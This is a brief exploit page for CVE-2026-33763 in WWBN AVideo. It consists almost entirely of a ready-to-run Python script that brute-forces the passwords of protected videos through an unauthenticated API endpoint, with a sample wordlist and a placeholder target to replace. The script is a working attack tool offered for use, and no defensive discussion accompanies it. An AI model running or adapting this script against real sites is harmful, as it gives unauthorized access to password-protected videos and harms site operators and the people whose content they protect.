CVE-2026-33763 AVideo视频密码验证漏洞

import requests # Exploit Title: WWBN AVideo Unauthenticated Video Password Brute Force # Date: 2026-03-27 # CVE: CVE-2026-33763 def brute_force_video_password(target_url, video_id, password_list): """ Attempts to brute force the password for a protected video on AVideo platform. """ endpoint = f"{target_url}/objects/get_api_video_password_is_correct.json" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } print(f"[*] Starting brute force for Video ID: {video_id}") for password in password_list: # Payload construction payload = { "video_id": video_id, "password": password.strip() } try: # Sending POST request to the vulnerable endpoint response = requests.post(endpoint, data=payload, headers=headers, timeout=5) if response.status_code == 200: response_data = response.json() # Analyzing the boolean response if response_data.get("passwordIsCorrect") is True: print(f"[+] SUCCESS! Password found: {password}") return password else: print(f"[-] Failed attempt: {password}") else: print(f"[!] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") print("[!] Brute force completed, password not found in list.") return None if __name__ == "__main__": # Configuration target = "http://localhost" # Replace with actual target host vid_id = "123" # Replace with valid Video ID wordlist = ["123456", "password", "admin", "12345678", "qwerty", "video"] brute_force_video_password(target, vid_id, wordlist)